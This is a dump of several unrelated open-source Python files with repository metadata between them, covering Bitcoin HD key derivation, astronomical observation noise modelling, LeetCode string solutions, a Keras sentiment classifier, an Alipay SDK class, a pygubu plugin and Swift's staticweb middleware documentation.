Ki = temp_priv_key.public_key.point + parent_key._key.point
if Ki.infinity:
return None
child_depth = parent_key.depth + 1
return HDPublicKey(x=Ki.x,
y=Ki.y,
chain_code=Ir,
index=i,
depth=child_depth,
parent_fingerprint=parent_key.fingerprint)
else:
raise TypeError("parent_key must be either a HDPrivateKey or HDPublicKey object")
def __init__(self, x, y, chain_code, index, depth,
parent_fingerprint=b'\x00\x00\x00\x00'):
key = PublicKey(x, y)
HDKey.__init__(self, key, chain_code, index, depth, parent_fingerprint)
PublicKeyBase.__init__(self)
@property
def identifier(self):
""" Returns the identifier for the key.
A key's identifier and fingerprint are defined as:
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki#key-identifiers
In this case, it will return the RIPEMD-160 hash of the
non-extended public key.
Returns:
bytes: A 20-byte RIPEMD-160 hash.
"""
return self.hash160()
def hash160(self, compressed=True):
""" Return the RIPEMD-160 hash of the SHA-256 hash of the
non-extended public key.
Note:
This always returns the hash of the compressed version of
the public key.
Returns:
bytes: RIPEMD-160 byte string.
"""
return self._key.hash160(True)
def address(self, compressed=True, testnet=False):
""" Address property that returns the Base58Check
encoded version of the HASH160.
Args:
compressed (bool): Whether or not the compressed key should
be used.
testnet (bool): Whether or not the key is intended for testnet
usage. False indicates mainnet usage.
Returns:
bytes: Base58Check encoded string
"""
return self._key.address(True, testnet)
def verify(self, message, signature, do_hash=True):
""" Verifies that message was appropriately signed.
Args:
message (bytes): The message to be verified.
signature (Signature): A signature object.
do_hash (bool): True if the message should be hashed prior
to signing, False if not. This should always be left as
True except in special situations which require doing
the hash outside (e.g. handling Bitcoin bugs).
Returns:
verified (bool): True if the signature is verified, False
otherwise.
"""
return self._key.verify(message, signature, do_hash)
@property
def compressed_bytes(self):
""" Byte string corresponding to a compressed representation
of this public key.
Returns:
b (bytes): A 33-byte long byte string.
"""
return self._key.compressed_bytes
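# --- Usage sketch (editor's addition, illustrative only) ---
# A minimal, hedged example of how the classes above fit together. It assumes
# the module's helpers referenced above (get_bytes, rand_bytes, sha3, Mnemonic,
# bitcoin_curve, base58, ...) are importable exactly as in the rest of the
# file; it is a sketch, not part of the original API.
if __name__ == "__main__":
    # Simple key pair: generate, sign, verify.
    priv = PrivateKey.from_random()
    pub = priv.public_key
    sig = priv.sign(b"hello")
    assert pub.verify(b"hello", sig)
    # DER round trip of the signature.
    assert Signature.from_der(sig.to_der()).to_der() == sig.to_der()
    # HD keys: master key from entropy, then a BIP-32 style derivation path.
    master, mnemonic = HDPrivateKey.master_key_from_entropy()
    child = HDKey.from_path(master, "m/44'/0'/0'/0/0")[-1]
    print(child.public_key.address())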
|
fe502e4a4513f0704957d34c893ff395672b0da3
|
8150b3e15b39199b231619f79b20f64eb941507e
|
/lenstronomy/SimulationAPI/observation_api.py
|
690f1a850232b776b2409ce4b9aa0dc482937e2b
|
[
"BSD-3-Clause"
] |
permissive
|
sibirrer/lenstronomy
|
8d48ca125fc588a1f97033255746afcdeaaa1e76
|
902a0f318da46bd444d408853f40f744603e2f35
|
refs/heads/main
| 2023-08-21T19:55:18.222805
| 2023-08-21T19:31:01
| 2023-08-21T19:31:01
| 80,772,893
| 115
| 76
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,290
|
py
|
observation_api.py
|
import numpy as np
import warnings
import lenstronomy.Util.data_util as data_util
from lenstronomy.Data.psf import PSF
from lenstronomy.Util.package_util import exporter
export, __all__ = exporter()
@export
class Instrument(object):
"""
basic access points to instrument properties
"""
def __init__(self, pixel_scale, read_noise=None, ccd_gain=None):
"""
:param read_noise: std of noise generated by read-out (in units of electrons)
:param pixel_scale: scale (in arcseconds) of pixels
:param ccd_gain: electrons/ADU (analog-to-digital unit).
A gain of 8 means that the camera digitizes the CCD signal
so that each ADU corresponds to 8 photoelectrons.
"""
if ccd_gain is not None:
ccd_gain = float(ccd_gain)
self.ccd_gain = ccd_gain
self._read_noise = read_noise
self.pixel_scale = pixel_scale
@export
class Observation(object):
"""
basic access point to observation properties
"""
def __init__(self, exposure_time, sky_brightness=None, seeing=None, num_exposures=1,
psf_type='GAUSSIAN', kernel_point_source=None, truncation=5, point_source_supersampling_factor=1):
"""
:param exposure_time: exposure time per image (in seconds)
:param sky_brightness: sky brightness (in magnitude per square arcseconds)
:param seeing: full width at half maximum of the PSF (if not specific psf_model is specified)
:param num_exposures: number of exposures that are combined
:param psf_type: string, type of PSF ('GAUSSIAN' and 'PIXEL' supported)
:param kernel_point_source: 2d numpy array, model of PSF centered with odd number of pixels per axis
(optional when psf_type='PIXEL' is chosen)
:param point_source_supersampling_factor: int, supersampling factor of kernel_point_source
(optional when psf_type='PIXEL' is chosen)
"""
self._exposure_time = exposure_time
self._sky_brightness_ = sky_brightness
self._num_exposures = num_exposures
self._seeing = seeing
self._psf_type = psf_type
self._truncation = truncation
self._kernel_point_source = kernel_point_source
self._point_source_supersampling_factor = point_source_supersampling_factor
def update_observation(self, exposure_time=None, sky_brightness=None, seeing=None, num_exposures=None,
psf_type=None, kernel_point_source=None):
"""
updates class instance with new properties if specific argument is not None
:param exposure_time: exposure time per image (in seconds)
:param sky_brightness: sky brightness (in magnitude per square arcseconds)
:param seeing: full width at half maximum of the PSF (if not specific psf_model is specified)
:param num_exposures: number of exposures that are combined
:param psf_type: string, type of PSF ('GAUSSIAN' and 'PIXEL' supported)
:param kernel_point_source: 2d numpy array, model of PSF centered with odd number of pixels per axis
(optional when psf_type='PIXEL' is chosen)
:return: None, updated class instance
"""
if exposure_time is not None:
self._exposure_time = exposure_time
if sky_brightness is not None:
self._sky_brightness_ = sky_brightness
if seeing is not None:
self._seeing = seeing
if num_exposures is not None:
self._num_exposures = num_exposures
if psf_type is not None:
self._psf_type = psf_type
if kernel_point_source is not None:
self._kernel_point_source = kernel_point_source
@property
def _sky_brightness(self):
if self._sky_brightness_ is None:
raise ValueError('sky_brightness is not set in the class instance!')
return self._sky_brightness_
@property
def exposure_time(self):
"""
total exposure time
:return: summed exposure time
"""
return self._exposure_time * self._num_exposures
@property
def kwargs_psf(self):
"""
keyword arguments to initiate a PSF() class
:return: kwargs_psf
"""
if self._psf_type == 'GAUSSIAN':
psf_type = "GAUSSIAN"
fwhm = self._seeing
truncation = self._truncation
kwargs_psf = {'psf_type': psf_type, 'fwhm': fwhm, 'truncation': truncation}
elif self._psf_type == 'PIXEL':
if self._kernel_point_source is not None:
kwargs_psf = {'psf_type': "PIXEL", 'kernel_point_source': self._kernel_point_source,
'point_source_supersampling_factor': self._point_source_supersampling_factor}
else:
raise ValueError("You need to create the class instance with a psf_model!")
elif self._psf_type == 'NONE':
kwargs_psf = {'psf_type': "NONE"}
else:
raise ValueError("psf_type %s not supported!" % self._psf_type)
return kwargs_psf
@property
def psf_class(self):
"""
creates instance of PSF() class based on knowledge of the observations
For the full possibility of how to create such an instance, see the PSF() class documentation
:return: instance of PSF() class
"""
psf_class = PSF(**self.kwargs_psf)
return psf_class
@export
class SingleBand(Instrument, Observation):
"""
class that combines Instrument and Observation
"""
def __init__(self, pixel_scale, exposure_time, magnitude_zero_point, read_noise=None, ccd_gain=None,
sky_brightness=None, seeing=None, num_exposures=1, psf_type='GAUSSIAN', kernel_point_source=None,
truncation=5, point_source_supersampling_factor=1, data_count_unit='e-', background_noise=None):
"""
:param read_noise: std of noise generated by read-out (in units of electrons)
:param pixel_scale: scale (in arcseconds) of pixels
:param ccd_gain: electrons/ADU (analog-to-digital unit).
A gain of 8 means that the camera digitizes the CCD signal
so that each ADU corresponds to 8 photoelectrons.
:param exposure_time: exposure time per image (in seconds)
:param sky_brightness: sky brightness (in magnitude per square arcseconds in units of electrons)
:param seeing: Full-Width-at-Half-Maximum (FWHM) of PSF
:param magnitude_zero_point: magnitude in which 1 count (e-) per second per arcsecond square is registered
:param num_exposures: number of exposures that are combined
:param point_source_supersampling_factor: int, supersampling factor of kernel_point_source
(optional when psf_type='PIXEL' is chosen)
:param data_count_unit: string, unit of the data (not noise properties - see other definitions),
'e-': (electrons assumed to be IID),
'ADU': (analog-to-digital unit)
:param background_noise: sqrt(variance of background) as a total contribution from readnoise,
sky brightness etc. in units of the data_count_units (e- or ADU)
If you set this parameter, it will use this value regardless of the values of read_noise, sky_brightness
"""
Instrument.__init__(self, pixel_scale, read_noise, ccd_gain) # read_noise and ccd_gain can be None
Observation.__init__(self, exposure_time=exposure_time, sky_brightness=sky_brightness,
seeing=seeing, num_exposures=num_exposures,
psf_type=psf_type, kernel_point_source=kernel_point_source,
point_source_supersampling_factor=point_source_supersampling_factor,
truncation=truncation)
if data_count_unit not in ['e-', 'ADU']:
raise ValueError("count_unit type %s not supported! Please choose e- or ADU." % data_count_unit)
self._data_count_unit = data_count_unit
self._background_noise = background_noise
self._magnitude_zero_point = magnitude_zero_point
@property
def sky_brightness(self):
"""
:return: sky brightness (counts per square arcseconds in unit of data (e- or ADU's) per unit time)
"""
cps = self._sky_brightness_cps
if self._data_count_unit == 'ADU':
cps /= self.ccd_gain
return cps
@property
def _sky_brightness_cps(self):
"""
:return: sky brightness in electrons per second
"""
cps = data_util.magnitude2cps(self._sky_brightness, magnitude_zero_point=self._magnitude_zero_point)
return cps
@property
def background_noise(self):
"""
Gaussian sigma of noise level per pixel in counts (e- or ADU) per second
:return: sqrt(variance) of background noise level in data units
"""
if self._background_noise is None:
if self._read_noise is None:
raise ValueError('read_noise is not specified to evaluate background noise!')
bkg_noise = data_util.bkg_noise(self._read_noise, self._exposure_time, self._sky_brightness_cps,
self.pixel_scale, num_exposures=self._num_exposures)
if self._data_count_unit == 'ADU':
bkg_noise /= self.ccd_gain
return bkg_noise
else:
if self._read_noise is not None:
warnings.warn('read noise is specified but not used for noise properties. Background noise is estimated'
' from "background_noise" argument.')
return self._background_noise
def flux_noise(self, flux):
"""
:param flux: float or array, in units of count_unit per second; flux values are expected to be non-negative (negative entries are clipped to zero variance below)
:return: Gaussian approximation of Poisson statistics in IIDs sqrt(variance)
"""
flux_iid = self.flux_iid(flux)
variance = flux_iid # the variance of a Poisson distribution is the IID count number
if isinstance(variance, int) or isinstance(variance, float):
variance = max(variance, 0)
else:
variance[flux_iid < 0] = 0 # make sure negative pixels do not lead to variances (or nans) in the return
noise = np.sqrt(variance) / self.exposure_time
if self._data_count_unit == 'ADU':
noise /= self.ccd_gain
return noise
def flux_iid(self, flux_per_second):
"""
IID counts. This can be used by lenstronomy to estimate the Poisson errors
keeping the assumption that the counts are IIDs (even if they are not).
:param flux_per_second: flux count per second in the units set in this class (ADU or e-)
:return: IID count number
"""
if self._data_count_unit == 'ADU':
exp_time = self.ccd_gain * self.exposure_time
else:
exp_time = self.exposure_time
return exp_time * flux_per_second
def noise_for_model(self, model, background_noise=True, poisson_noise=True, seed=None):
"""
:param model: 2d numpy array of modelled image (with pixels in units of data specified in class)
:param background_noise: bool, if True, adds background noise
:param poisson_noise: bool, if True, adds Poisson noise of modelled flux
:param seed: int, seed number to be used to render the noise properties.
If None, then uses the current numpy.random seed to render the noise properties.
:return: noise realization corresponding to the model
"""
if seed is not None:
g = np.random.RandomState(seed=seed)
else:
g = np.random
nx, ny = np.shape(model)
noise = np.zeros_like(model)
if background_noise is True:
noise += g.randn(nx, ny) * self.background_noise
if poisson_noise is True:
noise += g.randn(nx, ny) * self.flux_noise(model)
return noise
def estimate_noise(self, image):
"""
:param image: noisy data, background subtracted
:return: estimated noise map sqrt(variance) for each pixel as estimated from the instrument and observation
"""
return np.sqrt(self.background_noise**2 + self.flux_noise(image)**2)
def magnitude2cps(self, magnitude):
"""
converts an apparent magnitude to counts per second (in units of the data)
The zero point of an instrument, by definition, is the magnitude of an object that produces one count
(or data number, DN) per second. The magnitude of an arbitrary object producing DN counts in an observation of
length EXPTIME is therefore:
m = -2.5 x log10(DN / EXPTIME) + ZEROPOINT
:param magnitude: magnitude of object
:return: counts per second of object
"""
# compute counts in units of e- or ADS (depending on data and magnitude zero point defined)
cps = data_util.magnitude2cps(magnitude, magnitude_zero_point=self._magnitude_zero_point)
if self._data_count_unit == 'ADU':
cps /= self.ccd_gain
return cps
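# --- Usage sketch (editor's addition, illustrative only) ---
# A minimal example of combining Instrument and Observation through SingleBand.
# The numerical values below are made up for demonstration and are not
# recommendations for any particular instrument.
if __name__ == "__main__":
    band = SingleBand(pixel_scale=0.08,            # arcsec per pixel
                      exposure_time=900.,          # seconds per exposure
                      magnitude_zero_point=25.9,
                      read_noise=4.,               # e- per read-out
                      ccd_gain=2.5,                # e- per ADU
                      sky_brightness=22.3,         # mag per arcsec^2
                      seeing=0.1,                  # PSF FWHM in arcsec
                      num_exposures=4,
                      psf_type='GAUSSIAN',
                      data_count_unit='e-')
    model = np.ones((10, 10)) * 0.5                # model image in e-/s
    noise_map = band.estimate_noise(model)
    noise_realization = band.noise_for_model(model, seed=42)
    print(band.background_noise, noise_map.mean(), noise_realization.std())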
|
650702b0061979988570a2e80affc3ce968f119a
|
10ddfb2d43a8ec5d47ce35dc0b8acf4fd58dea94
|
/Python/distinct-echo-substrings.py
|
1f065c5472e98c2dece05708af253fb69eb80583
|
[
"MIT"
] |
permissive
|
kamyu104/LeetCode-Solutions
|
f54822059405ef4df737d2e9898b024f051fd525
|
4dc4e6642dc92f1983c13564cc0fd99917cab358
|
refs/heads/master
| 2023-09-02T13:48:26.830566
| 2023-08-28T10:11:12
| 2023-08-28T10:11:12
| 152,631,182
| 4,549
| 1,651
|
MIT
| 2023-05-31T06:10:33
| 2018-10-11T17:38:35
|
C++
|
UTF-8
|
Python
| false
| false
| 3,601
|
py
|
distinct-echo-substrings.py
|
# Time: O(n^2 + d), where d is the total length of duplicated result substrings
# Space: O(r), r is the size of result substrings set
class Solution(object):
def distinctEchoSubstrings(self, text):
"""
:type text: str
:rtype: int
"""
def KMP(text, l, result):
prefix = [-1]*(len(text)-l)
j = -1
for i in xrange(1, len(prefix)):
while j > -1 and text[l+j+1] != text[l+i]:
j = prefix[j]
if text[l+j+1] == text[l+i]:
j += 1
prefix[i] = j
if (j+1) and (i+1) % ((i+1) - (j+1)) == 0 and \
(i+1) // ((i+1) - (j+1)) % 2 == 0:
result.add(text[l:l+i+1])
return len(prefix)-(prefix[-1]+1) \
if prefix[-1]+1 and len(prefix) % (len(prefix)-(prefix[-1]+1)) == 0 \
else float("inf")
result = set()
i, l = 0, len(text)-1
while i < l: # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabcdefabcdefabcdef
l = min(l, i + KMP(text, i, result))
i += 1
return len(result)
# Time: O(n^2 + d), where d is the total length of duplicated result substrings
# Space: O(r), r is the size of result substrings set
class Solution2(object):
def distinctEchoSubstrings(self, text):
"""
:type text: str
:rtype: int
"""
result = set()
for l in xrange(1, len(text)//2+1):
count = sum(text[i] == text[i+l] for i in xrange(l))
for i in xrange(len(text)-2*l):
if count == l:
result.add(text[i:i+l])
count += (text[i+l] == text[i+l+l]) - (text[i] == text[i+l])
if count == l:
result.add(text[len(text)-2*l:len(text)-2*l+l])
return len(result)
# Time: O(n^2 + d), where d is the total length of duplicated result substrings
# Space: O(r), r is the size of result substrings set
class Solution3(object):
def distinctEchoSubstrings(self, text):
"""
:type text: str
:rtype: int
"""
MOD = 10**9+7
D = 27 # a-z and ''
result = set()
for i in xrange(len(text)-1):
left, right, pow_D = 0, 0, 1
for l in xrange(1, min(i+2, len(text)-i)):
left = (D*left + (ord(text[i-l+1])-ord('a')+1)) % MOD
right = (pow_D*(ord(text[i+l])-ord('a')+1) + right) % MOD
if left == right: # assumed no collision
result.add(left)
pow_D = (pow_D*D) % MOD
return len(result)
# Time: O(n^3 + d), where d is the total length of duplicated result substrings
# Space: O(r), r is the size of result substrings set
class Solution_TLE(object):
def distinctEchoSubstrings(self, text):
"""
:type text: str
:rtype: int
"""
def compare(text, l, s1, s2):
for i in xrange(l):
if text[s1+i] != text[s2+i]:
return False
return True
MOD = 10**9+7
D = 27 # a-z and ''
result = set()
for i in xrange(len(text)):
left, right, pow_D = 0, 0, 1
for l in xrange(1, min(i+2, len(text)-i)):
left = (D*left + (ord(text[i-l+1])-ord('a')+1)) % MOD
right = (pow_D*(ord(text[i+l])-ord('a')+1) + right) % MOD
if left == right and compare(text, l, i-l+1, i+1):
result.add(text[i+1:i+1+l])
pow_D = (pow_D*D) % MOD
return len(result)
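# --- Usage sketch (editor's addition, illustrative only) ---
# The solutions above rely on xrange and therefore target Python 2. A quick
# cross-check on a small input: "abcabcabc" has three distinct echo substrings
# ("abcabc", "bcabca", "cabcab"), so both calls below should print 3.
if __name__ == "__main__":
    text = "abcabcabc"
    print(Solution().distinctEchoSubstrings(text))
    print(Solution2().distinctEchoSubstrings(text))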
|
07f4bf681dac89025c8e4b294aa4ee847406dc43
|
0ba2e5061577f6286ff9265ef1df9aca96769445
|
/machine_learning/sentiment_analysis_twitter/Deep Learning/sentiment_cnn.py
|
819c19a881caf404343d6c4aab00d4ad377a8f4a
|
[
"CC0-1.0"
] |
permissive
|
ZoranPandovski/al-go-rithms
|
68d5d02f80a61de9baf8e50a81a52e7d0b3983a0
|
4ae6ba54e90af14af236e03e435eb0402dcac787
|
refs/heads/master
| 2023-09-04T16:04:04.321676
| 2023-06-06T15:22:16
| 2023-06-06T15:22:16
| 93,438,176
| 1,421
| 2,445
|
CC0-1.0
| 2023-06-15T14:24:28
| 2017-06-05T19:20:20
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,592
|
py
|
sentiment_cnn.py
|
import numpy as np
import pandas as pd
from keras.layers import Input, Dense, Bidirectional, Embedding, Dropout, Flatten
from keras.layers import concatenate, SpatialDropout1D, GlobalAveragePooling1D, GlobalMaxPooling1D
from keras.layers.convolutional import Conv1D
from keras.layers.convolutional import MaxPooling1D
from keras.models import Model
from sklearn.model_selection import train_test_split
from utils import *
maxlen = 150
max_features = 2500
gop = pd.read_csv('Data/gop.csv')
data = gop[['text','sentiment']]
# Balance Negative - Positive tweets
data[data['sentiment'] == 'Negative'] = data[data['sentiment'] == 'Negative'][:2236]
data = data.dropna()
data['sentiment'].value_counts() #Negative: 8493; Neutral: 3142; Positive: 2236
X, Y = format_data(data, max_features, maxlen)
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.25, random_state=42)
# Input shape
inp = Input(shape=(maxlen,))
# Embedding and CNN
x = Embedding(max_features, 150)(inp)
x = SpatialDropout1D(0.25)(x)
x = Conv1D(filters=32, kernel_size=3, padding='same', activation='relu')(x)
x = MaxPooling1D(pool_size=2)(x)
x = Conv1D(filters=16, kernel_size=5, padding='same', activation='relu')(x)
x = MaxPooling1D(pool_size=4)(x)
x = Flatten()(x)
# Output layer
output = Dense(1, activation='sigmoid')(x)
model = Model(inputs=inp, outputs=output)
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
model.fit(X_train, Y_train, epochs=5, batch_size=32, verbose=1)
results = model.predict(X_test, batch_size=1, verbose=1)
run_test(results, Y_test)
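# --- Editor's note (illustrative only) ---
# If the helper run_test() from utils is unavailable, a rough manual check of
# the sigmoid outputs might look like the following. It assumes Y_test holds
# binary 0/1 labels, which is consistent with the single sigmoid output and
# binary_crossentropy loss used above, but is not guaranteed by this script.
preds = (results.ravel() > 0.5).astype(int)
manual_accuracy = (preds == np.asarray(Y_test).ravel()).mean()
print('manual accuracy: %.3f' % manual_accuracy)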
|
736280c58da00a16f404f5b4a72280841ea84398
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/CreditResult.py
|
8d2525ee3bb58dde79eaaac5d267a9e344dcf688
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 6,171
|
py
|
CreditResult.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class CreditResult(object):
def __init__(self):
self._credit_line = None
self._credit_no = None
self._credit_term = None
self._credit_term_unit = None
self._effective_date = None
self._expire_date = None
self._fee_rate = None
self._interest_rate = None
self._loan_term = None
self._loan_term_unit = None
self._repayment_mode = None
@property
def credit_line(self):
return self._credit_line
@credit_line.setter
def credit_line(self, value):
self._credit_line = value
@property
def credit_no(self):
return self._credit_no
@credit_no.setter
def credit_no(self, value):
self._credit_no = value
@property
def credit_term(self):
return self._credit_term
@credit_term.setter
def credit_term(self, value):
self._credit_term = value
@property
def credit_term_unit(self):
return self._credit_term_unit
@credit_term_unit.setter
def credit_term_unit(self, value):
self._credit_term_unit = value
@property
def effective_date(self):
return self._effective_date
@effective_date.setter
def effective_date(self, value):
self._effective_date = value
@property
def expire_date(self):
return self._expire_date
@expire_date.setter
def expire_date(self, value):
self._expire_date = value
@property
def fee_rate(self):
return self._fee_rate
@fee_rate.setter
def fee_rate(self, value):
self._fee_rate = value
@property
def interest_rate(self):
return self._interest_rate
@interest_rate.setter
def interest_rate(self, value):
self._interest_rate = value
@property
def loan_term(self):
return self._loan_term
@loan_term.setter
def loan_term(self, value):
self._loan_term = value
@property
def loan_term_unit(self):
return self._loan_term_unit
@loan_term_unit.setter
def loan_term_unit(self, value):
self._loan_term_unit = value
@property
def repayment_mode(self):
return self._repayment_mode
@repayment_mode.setter
def repayment_mode(self, value):
self._repayment_mode = value
def to_alipay_dict(self):
params = dict()
if self.credit_line:
if hasattr(self.credit_line, 'to_alipay_dict'):
params['credit_line'] = self.credit_line.to_alipay_dict()
else:
params['credit_line'] = self.credit_line
if self.credit_no:
if hasattr(self.credit_no, 'to_alipay_dict'):
params['credit_no'] = self.credit_no.to_alipay_dict()
else:
params['credit_no'] = self.credit_no
if self.credit_term:
if hasattr(self.credit_term, 'to_alipay_dict'):
params['credit_term'] = self.credit_term.to_alipay_dict()
else:
params['credit_term'] = self.credit_term
if self.credit_term_unit:
if hasattr(self.credit_term_unit, 'to_alipay_dict'):
params['credit_term_unit'] = self.credit_term_unit.to_alipay_dict()
else:
params['credit_term_unit'] = self.credit_term_unit
if self.effective_date:
if hasattr(self.effective_date, 'to_alipay_dict'):
params['effective_date'] = self.effective_date.to_alipay_dict()
else:
params['effective_date'] = self.effective_date
if self.expire_date:
if hasattr(self.expire_date, 'to_alipay_dict'):
params['expire_date'] = self.expire_date.to_alipay_dict()
else:
params['expire_date'] = self.expire_date
if self.fee_rate:
if hasattr(self.fee_rate, 'to_alipay_dict'):
params['fee_rate'] = self.fee_rate.to_alipay_dict()
else:
params['fee_rate'] = self.fee_rate
if self.interest_rate:
if hasattr(self.interest_rate, 'to_alipay_dict'):
params['interest_rate'] = self.interest_rate.to_alipay_dict()
else:
params['interest_rate'] = self.interest_rate
if self.loan_term:
if hasattr(self.loan_term, 'to_alipay_dict'):
params['loan_term'] = self.loan_term.to_alipay_dict()
else:
params['loan_term'] = self.loan_term
if self.loan_term_unit:
if hasattr(self.loan_term_unit, 'to_alipay_dict'):
params['loan_term_unit'] = self.loan_term_unit.to_alipay_dict()
else:
params['loan_term_unit'] = self.loan_term_unit
if self.repayment_mode:
if hasattr(self.repayment_mode, 'to_alipay_dict'):
params['repayment_mode'] = self.repayment_mode.to_alipay_dict()
else:
params['repayment_mode'] = self.repayment_mode
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = CreditResult()
if 'credit_line' in d:
o.credit_line = d['credit_line']
if 'credit_no' in d:
o.credit_no = d['credit_no']
if 'credit_term' in d:
o.credit_term = d['credit_term']
if 'credit_term_unit' in d:
o.credit_term_unit = d['credit_term_unit']
if 'effective_date' in d:
o.effective_date = d['effective_date']
if 'expire_date' in d:
o.expire_date = d['expire_date']
if 'fee_rate' in d:
o.fee_rate = d['fee_rate']
if 'interest_rate' in d:
o.interest_rate = d['interest_rate']
if 'loan_term' in d:
o.loan_term = d['loan_term']
if 'loan_term_unit' in d:
o.loan_term_unit = d['loan_term_unit']
if 'repayment_mode' in d:
o.repayment_mode = d['repayment_mode']
return o
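# --- Usage sketch (editor's addition, illustrative only) ---
# Round-tripping a CreditResult through the dict helpers defined above. The
# field values are made-up examples, not real Alipay API data.
if __name__ == "__main__":
    payload = {
        'credit_no': 'C202301010001',
        'credit_line': '10000.00',
        'credit_term': 12,
        'credit_term_unit': 'MONTH',
        'interest_rate': '0.05',
        'repayment_mode': 'MONTHLY',
    }
    result = CreditResult.from_alipay_dict(payload)
    print(json.dumps(result.to_alipay_dict(), ensure_ascii=False))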
|
973a42b57c5afbd5bdbc0c84fed173e00d98b9b5
|
52f9d2edfe80b683f33832ecf81317ef04da7cd7
|
/src/pygubu/plugins/tk/__init__.py
|
825a2eb4647fc19ffc4bdab800498fdf234b7a2f
|
[
"MIT"
] |
permissive
|
alejandroautalan/pygubu
|
bd1dd455509adadbe91338dec8588c76d4629a50
|
493eaf7f1954d289d996f6b87d35032861f6baac
|
refs/heads/master
| 2023-09-01T14:43:16.502055
| 2023-07-21T01:35:41
| 2023-07-21T01:35:41
| 8,170,146
| 2,026
| 289
|
MIT
| 2023-07-04T03:53:27
| 2013-02-13T00:02:24
|
Python
|
UTF-8
|
Python
| false
| false
| 443
|
py
|
__init__.py
|
from pygubu.api.v1 import BuilderLoaderPlugin
class StandardTKWidgetsLoader(BuilderLoaderPlugin):
_module = "pygubu.plugins.tk.tkstdwidgets"
def do_activate(self) -> bool:
return True
def get_module_for(self, identifier: str) -> str:
return self._module
def get_all_modules(self):
return (self._module,)
def can_load(self, identifier: str) -> bool:
return identifier.startswith("tk.")
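# Hedged note (illustrative, not part of the original plugin): with this
# loader registered, builder identifiers prefixed with "tk." (for example
# "tk.Button") are routed to the pygubu.plugins.tk.tkstdwidgets module,
# while identifiers without that prefix are left for other loader plugins.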
|
5139851a8762b8b98399a781ccbd102191beb5e2
|
3daa53a2190f365ee2e2acae39ca4e84919f2f50
|
/swift/common/middleware/staticweb.py
|
c01f720f14e4ae123a829bac317dd456048c6ba1
|
[
"Apache-2.0"
] |
permissive
|
openstack/swift
|
4c8e4a14c1c6f7efb049f983ede28e89bd2e9140
|
f06e5369579599648cc78e4b556887bc6d978c2b
|
refs/heads/master
| 2023-08-28T15:04:33.200849
| 2023-08-24T20:35:07
| 2023-08-24T21:05:48
| 790,019
| 2,370
| 957
|
Apache-2.0
| 2023-06-22T02:45:53
| 2010-07-22T01:50:07
|
Python
|
UTF-8
|
Python
| false
| false
| 24,807
|
py
|
staticweb.py
|
# Copyright (c) 2010-2016 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This StaticWeb WSGI middleware will serve container data as a static web site
with index file and error file resolution and optional file listings. This mode
is normally only active for anonymous requests. When using keystone for
authentication set ``delay_auth_decision = true`` in the authtoken middleware
configuration in your ``/etc/swift/proxy-server.conf`` file. If you want to
use it with authenticated requests, set the ``X-Web-Mode: true`` header on the
request.
The ``staticweb`` filter should be added to the pipeline in your
``/etc/swift/proxy-server.conf`` file just after any auth middleware. Also, the
configuration section for the ``staticweb`` middleware itself needs to be
added. For example::
[DEFAULT]
...
[pipeline:main]
pipeline = catch_errors healthcheck proxy-logging cache ratelimit tempauth
staticweb proxy-logging proxy-server
...
[filter:staticweb]
use = egg:swift#staticweb
Any publicly readable containers (for example, ``X-Container-Read: .r:*``, see
:ref:`acls` for more information on this) will be checked for
X-Container-Meta-Web-Index and X-Container-Meta-Web-Error header values::
X-Container-Meta-Web-Index <index.name>
X-Container-Meta-Web-Error <error.name.suffix>
If X-Container-Meta-Web-Index is set, any <index.name> files will be served
without having to specify the <index.name> part. For instance, setting
``X-Container-Meta-Web-Index: index.html`` will be able to serve the object
.../pseudo/path/index.html with just .../pseudo/path or .../pseudo/path/
If X-Container-Meta-Web-Error is set, any errors (currently just 401
Unauthorized and 404 Not Found) will instead serve the
.../<status.code><error.name.suffix> object. For instance, setting
``X-Container-Meta-Web-Error: error.html`` will serve .../404error.html for
requests for paths not found.
For pseudo paths that have no <index.name>, this middleware can serve HTML file
listings if you set the ``X-Container-Meta-Web-Listings: true`` metadata item
on the container.
If listings are enabled, the listings can have a custom style sheet by setting
the X-Container-Meta-Web-Listings-CSS header. For instance, setting
``X-Container-Meta-Web-Listings-CSS: listing.css`` will make listings link to
the .../listing.css style sheet. If you "view source" in your browser on a
listing page, you will see the well defined document structure that can be
styled.
By default, the listings will be rendered with a label of
"Listing of /v1/account/container/path". This can be altered by
setting a ``X-Container-Meta-Web-Listings-Label: <label>``. For example,
if the label is set to "example.com", a label of
"Listing of example.com/path" will be used instead.
The content-type of directory marker objects can be modified by setting
the ``X-Container-Meta-Web-Directory-Type`` header. If the header is not set,
application/directory is used by default. Directory marker objects are
0-byte objects that represent directories to create a simulated hierarchical
structure.
Example usage of this middleware via ``swift``:
Make the container publicly readable::
swift post -r '.r:*' container
You should be able to get objects directly, but no index.html resolution or
listings.
Set an index file directive::
swift post -m 'web-index:index.html' container
You should be able to hit paths that have an index.html without needing to
type the index.html part.
Turn on listings::
swift post -r '.r:*,.rlistings' container
swift post -m 'web-listings: true' container
Now you should see object listings for paths and pseudo paths that have no
index.html.
Enable a custom listings style sheet::
swift post -m 'web-listings-css:listings.css' container
Set an error file::
swift post -m 'web-error:error.html' container
